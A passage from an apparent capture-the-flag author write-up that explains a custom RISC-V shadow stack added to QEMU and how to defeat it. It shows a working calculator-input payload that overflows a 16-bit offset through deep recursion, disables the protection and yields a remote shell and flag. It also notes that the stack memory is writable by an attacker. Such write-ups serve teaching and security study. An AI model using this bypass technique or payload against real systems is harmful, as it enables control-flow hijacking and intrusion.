+ TCGLabel *shadow_pact_end = gen_new_label();
+
+ TCGv dark_offset = tcg_temp_new();
+ TCGv_i32 csr_darkoff = tcg_constant_i32(CSR_DARKOFF);
+ gen_helper_csrr(dark_offset, cpu_env, csr_darkoff);
+ tcg_gen_brcondi_tl(TCG_COND_EQ, dark_offset, 0, shadow_pact_end);
+
+ tcg_gen_addi_tl(dark_offset, dark_offset, -1 * get_xlen_bytes(ctx));
+ gen_helper_csrw(cpu_env, csr_darkoff, dark_offset);
+ TCGv darkest_address = get_darkest_address(ctx, dark_offset);
+
+ TCGv dark_pc = tcg_temp_new();
+ tcg_gen_qemu_ld_tl(dark_pc, darkest_address, ctx->mem_idx,
+ MO_ALIGN | MO_TE | size_memop(get_xlen_bytes(ctx)));
+ tcg_gen_brcond_tl(TCG_COND_EQ, cpu_pc, dark_pc, shadow_pact_end);
+
+ tcg_gen_st_tl(cpu_pc, cpu_env, offsetof(CPURISCVState, badaddr));
+ generate_exception(ctx, RISCV_EXCP_SHADOW);
+
+ gen_set_label(shadow_pact_end);
+ }
+
lookup_and_goto_ptr(ctx);
if (misaligned) {
This part of the patch modifies the logic for the jalr
instruction when the condition a->rd == 0 && a->rs1 == xRA && a->imm == 0
is met. This corresponds to a jalr x0, xRA, 0
which is what the pseudo-instruction ret
extends to.
The pseudo-code added to the ret
is:
// [...] Normal jalr instruction
TCG[dark_offset] = CSR[dark_offset]; // gen_helper_csrr
if (TCG[dark_offset] == 0) goto LABEL_shadow_pact_end; // tcg_gen_brcondi_tl (conditionnal jump, comparison against an immediate)
TCG[dark_offset] = TCG[dark_offset] - xlen_bytes(); // tcg_gen_addi_tl
CSR[dark_offset] = TCG[dark_offset]; // gen_helper_csrw
TCG[darkest_address] = darkest_adress();
TCG[dark_pc] = *TCG[darkest_address]; // tcg_gen_qemu_ld_tl (load)
if (PC == TCG[dark_pc]) goto LABEL_shadow_pact_end; // tcg_gen_brcond_tl (conditionnal jump)
// If we reach here, we trigger a shadow exception!
LABEL_shadow_pact_end:
// [...] Normal jalr instruction
The augmented instructions now make a pop from the shadow stack. The popped value, called dark_pc
, is compared to the pc
originally computed by the jalr
instructions. If they are different, then a shadow exception is triggered.
All the logic is circumvented if the shadow stack is in its post-initialization, unused state, with the dark_offset
containing 0.
diff --git a/linux-user/riscv/cpu_loop.c b/linux-user/riscv/cpu_loop.c
index bffca7db12..85e9bfceb0 100644
--- a/linux-user/riscv/cpu_loop.c
+++ b/linux-user/riscv/cpu_loop.c
@@ -72,6 +72,17 @@ void cpu_loop(CPURISCVState *env)
goto gdbstep;
}
break;
+ case RISCV_EXCP_SHADOW:
+ fprintf(stderr, "\n");
+ fprintf(stderr, "================================================\n");
+ fprintf(stderr, "Shadow exception triggered!\n");
+ fprintf(stderr, "(Conveniently handled as an illegal instruction)\n");
+ fprintf(stderr, "\n");
+ fprintf(stderr, "The current dark page is 0x" TARGET_FMT_lx "\n", env->dark_page);
+ fprintf(stderr, "The current dark offset is 0x%" PRIx8 "\n", env->dark_offset);
+ fprintf(stderr, "================================================\n");
+ fprintf(stderr, "\n");
+ __attribute__ ((fallthrough));
case RISCV_EXCP_ILLEGAL_INST:
force_sig_fault(TARGET_SIGILL, TARGET_ILL_ILLOPC, env->pc);
break;
This final part handles the new shadow exception. An error message is displayed, indicating the status of the two custom registers, to help the players for debugging purposes. The exception then falls through to the standard illegal instruction and the program comes to a stop.
Let’s get back to pwning. As mentioned earlier, the patch’s weakness lies in the ability to overflow the dark_offset
, encoded as an uint16_t
. Since pushing a value on the stack (calling obscure
) increases this offset by 8, we need at least 2^(16-3) = 8192
protected function calls to overflow the offset.
This can be achieved with the power operation which is implemented recursively by the calculator:
void handle_power (node_t* node, int64_t results[], int64_t power) {
IN_SHADOW
if (power == 0) {
return;
}
node_t *node_l = node->content.binop.node_l;
results[node->content.binop.id] *= get_value(node_l, results);
handle_power(node, results, --power);
}
error_kind do_power (node_t* node, int64_t results[]) {
IN_SHADOW
node_t *node_l = node->content.binop.node_l;
node_t *node_r = node->content.binop.node_r;
int64_t power = get_value(node_r, results);
if (power < 0) {
return ERROR_POWER_NEGATIVE;
}
if (power == 0) {
results[node->content.binop.id] = 1;
return ERROR_NO_ERROR;
}
results[node->content.binop.id] = get_value(node_l, results);
handle_power(node, results, --power);
return ERROR_NO_ERROR;
}
We can use a value larger than 8192, for instance 10000: the extra function calls pass the overflow will just return and the dark_offset
will stop at zero.
Further return operations will keep the offset at 0 and the shadow stack disabled. Even if we call a protected function at some point, re-enabling the shadow stack at this moment, this function will eventually return.
This behaviour is actually used in the program: the main
function is not protected and can therefore make use of libc
functions. Once main
calls secure_calc
, the shadow stack is used and then it is only possible to use protected functions (this implied that I had, for instance, to implement a custom memzero
function inside calc.c
). After secure_calc
returns, it is possible to use unprotected libc
functions again.
Hence, the shadow stack bypass will work whenever it happens during the calculation, and we can just adapt the previous payload by replacing a (1)(1)
operation with (1**10000)
, resulting in:
(1**10000)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(0+1-1)+(0*0*0+274886825460+0+700628+0-798784)
This finally gives us a remote shell, and the flag: ECW{1n57ruc710n_5375_w4n7_70_b3_fr33}
(a reference to a milestone paper in RISC-V early history).
As a sidenote, this implementation of a shadow stack has other flaws. Namely, no special permission is set up in the MMU for the memory region hosting the shadow stack (which lies in user space). Therefore, the memory here is freely mutable by an attacker with a write primitive, bypassing the protection.
If you are interested in further resources on the subject, an official draft specification for an official RISC-V shadow stack is available with the Zicfiss extension, part of the RISC-V CFI Specification. There is also a corresponding attempted QEMU PR.
Conclusion
Ever since my student days when I learned about shadow stacks, it had always been a frustration of mine not having the occasion to actually implement one, so now things are settled.
It was my first time designing a challenge, and I would like to thank my colleagues for their precious feedback, tips and testing without which this challenge wouldn’t be as it is.
Finally, thanks to all the players who attempted to solve The Calculator in Shadow, I hope I was able to convey my enthusiasm for RISC-V with you!